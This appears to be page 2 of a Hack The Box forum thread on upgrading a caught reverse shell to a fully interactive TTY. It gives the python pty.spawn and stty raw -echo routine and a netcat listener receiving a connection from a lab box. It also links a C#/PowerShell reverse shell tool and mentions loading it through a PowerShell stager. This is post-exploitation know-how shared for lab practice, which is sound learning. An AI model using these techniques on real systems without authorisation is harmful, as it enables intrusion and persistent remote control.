Obtaining a Fully Interactive Shell

2»

Comments

  • Type your comment> @KeyboardCaper said:

    After getting a terminal:

    python -c 'import pty; pty.spawn("/bin/bash")'
    CTRL-z
    bg
    stty raw -echo
    fg
    reset
    (In case of unknown terminal type try: linux)

    Optional:
    export SHELL=/bin/bash
    export TERM=xterm-color
    export HOME=

    Then fix up the rows and columns. Open another terminal
    stty -a

    Get the rows and columns.

    Back on your reverse shell:
    stty rows <> columns <>

    Rarely does the python part not work... when it doesn't I simply find a work around or just deal with what I have.

    Probably good to note for this that python -c 'import pty;pty.spawn("/bin/bash")' won't work with any versions of Python3, so specifying python3 -c ... is necessary. Otherwise solid description, you nailed it to a "T".


    Hack The Box
    defarbs.com | Retired Machine Writeups! - "Let me just quote the late, great Colonel Sanders, who said, 'I'm too drunk... to taste this chicken.'”

  • I have a curious problem with this kind of shell. I'm working with the Kali KDE distribution with the standard Konsole terminal and /bin/bash/.

    I start a reverse shell from another machine.

    On my attacking machine I have netcat listening:
    nc -l -v -p 80

    I get the connection on my host:
    listening on [any] 80 ...
    connect to [10.10.14.2] from craft.htb [10.10.10.110] 40575
    /bin/sh: can't access tty; job control turned off
    /opt/app #

    I do my routine to elevate the shell:
    python -c 'import pty; pty.spawn("/bin/bash")'
    CTRL-z
    stty raw -echo
    fg
    reset

    I have a fully functional shell BUT I can't close it. I'll always have to kill the process. I use exit to leave the shell and end up in a window where I can't enter any commands. At first I thought that it is a problem with zsh (stty raw -echo; fg kind of) but it is the same in /bin/bash and in Xterm instead of Konsole.

    Any Ideas what could go wrong here?

    On a side note, what if I don't have an /bin/bash on the remote machine? Is it possible to get an fully interactive shell?

  • edited September 2019

    @timebeyond said:
    I have a fully functional shell BUT I can't close it. I'll always have to kill the process. I use exit to leave the shell and end up in a window where I can't enter any commands. At first I thought that it is a problem with zsh (stty raw -echo; fg kind of) but it is the same in /bin/bash and in Xterm instead of Konsole.

    I actually had this exact same issue when I was working on networked. I had to kill the process, but I am not sure what went wrong.

    On a side note, what if I don't have an /bin/bash on the remote machine? Is it possible to get an fully interactive shell?

    You can use /bin/sh, which is most of the time just a symbolic link to the real active shell.

  • Thanks for the reassurance that my standard setup has no flaws. Just wanted to be sure that the problem isn't between the keyboard and the chair.

  • edited September 2019

    If you are looking for a way to get fully interactive shell on Windows i just released a c#/powershell reverse shell that implements the pty console. Here the link --> https://github.com/antonioCoco/ConPtyShell

    splintercode

  • > @splintercode said:
    > If you are looking for a way to get fully interactive shell on Windows i just released a c#/powershell reverse shell that implements the pty console. Here the link --> https://github.com/antonioCoco/ConPtyShell

    This is absolutely glorious! Just tried it, and suddenly my smb-recon-using-linux-tools-PTSD is cured by the healing light of PS in a PTY :)
  • @splintercode it appears to have some issues deciding which process that listens to the input pipe though. I run the shell from a small PS-stager that IEXs the Invoke-Con*-definition along with an invocation in the same command, and often I get atleast two powershell.exe's spinning up a process each for every one I try to start :)

  • edited December 2019

    @scud78 i don't understand the bugged scenario. If you can open an issue on github (https://github.com/antonioCoco/ConPtyShell/issues) i could troubleshoot the scenario and work for a fix.

    splintercode

  • @splintercode said:
    @scud78 i don't understand the bugged scenario. If you can open an issue on github (https://github.com/antonioCoco/ConPtyShell/issues) i could troubleshoot the scenario and work for a fix.

    Turns out it was the combination of three (or possibly four) nested powershell processes (including yours) with DUPd stdhandles. Not much you can do about that, really ;)

  • Hey, my terminal lags like crazy when I'm upgrading my shell to a fully interactive one with python -c 'import ..... It happens after I type in stty raw -echo and forground the nc session. Anybody has similar issue?

  • indeed a fun box. a little observation, OSINT and boom. rest is pretty simple.

  • pm me if need any help.

  • @MrSHolmes said:

    indeed a fun box. a little observation, OSINT and boom. rest is pretty simple.

    Did you post this on the wrong thread?

    TazWake

    Happy to help people but PLEASE explain your problem in as much detail as possible!

Sign In to comment.